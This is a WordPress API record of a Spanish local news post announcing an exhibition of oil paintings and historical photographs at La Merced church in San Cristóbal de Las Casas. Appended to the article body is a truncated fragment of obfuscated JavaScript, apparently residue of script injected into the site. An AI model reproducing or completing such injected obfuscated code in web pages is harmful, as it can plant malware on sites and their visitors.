{"id":17933,"date":"2024-09-19T05:16:51","date_gmt":"2024-09-19T05:16:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17933"},"modified":"2024-09-19T05:16:52","modified_gmt":"2024-09-19T05:16:52","slug":"presentaran-oleos-ineditos-de-la-virgen-de-la-merced","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17933","title":{"rendered":"Presentar\u00e1n \u00f3leos in\u00e9ditos de la Virgen de La Merced"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240918-WA0015-1024x770.jpg\" alt=\"\" class=\"wp-image-17934\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240918-WA0015-1024x770.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240918-WA0015-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240918-WA0015-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240918-WA0015.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>18 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el templo de La Merced se presentar\u00e1n dos pinturas al \u00f3leo de la Virgen de La Merced y tres acervos fotogr\u00e1ficos que abarcan de 1980 a 1975. Los integrantes de Cultura Mercedaria, Emir D\u00edaz y Miguel \u00c1ngel Mu\u00f1oz Luna, dieron a conocer los detalles de la segunda edici\u00f3n del conversatorio que hablar\u00e1 sobre la historia del barrio.<br>En entrevista, dieron a conocer que se destacar\u00e1n dos colecciones fotogr\u00e1ficas particulares: la de don Crist\u00f3bal Trujillo y la de don Gilberto Tovilla. &#8220;Son im\u00e1genes in\u00e9ditas que reflejan la vida cotidiana y familiar de la comunidad&#8221;, se\u00f1alaron los organizadores.<br>Adem\u00e1s, indicaron que muchas de las fotograf\u00edas expuestas hab\u00edan ca\u00eddo en el olvido, por lo que el evento representa una oportunidad \u00fanica para redescubrir y preservar la historia visual de La Merced.<br>El conversatorio tambi\u00e9n incluir\u00e1 una charla sobre la historia del barrio y el exterior del templo, donde se abordar\u00e1n temas de gran relevancia para los asistentes. &#8220;El prop\u00f3sito es explicar el valor hist\u00f3rico y cultural de La Merced, a trav\u00e9s de este material visual que estar\u00e1 expuesto durante la presentaci\u00f3n&#8221;, mencionaron D\u00edaz y Mu\u00f1oz Luna.<br>La comunidad est\u00e1 invitada a participar en este evento, que se realizar\u00e1 el viernes 20 de septiembre a las 19 horas en el Templo de La Merced, el cual busca honrar el legado visual y cultural de uno de los barrios m\u00e1s emblem\u00e1ticos de la ciudad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 18 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el templo de La Merced se presentar\u00e1n dos pinturas al \u00f3leo de la Virgen de La Merced y tres acervos fotogr\u00e1ficos que abarcan de 1980 a 1975. Los integrantes de Cultura Mercedaria, Emir D\u00edaz y Miguel \u00c1ngel Mu\u00f1oz Luna, dieron a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17934,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17933","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17933","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17933"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17933\/revisions"}],"predecessor-version":[{"id":17935,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17933\/revisions\/17935"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17934"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}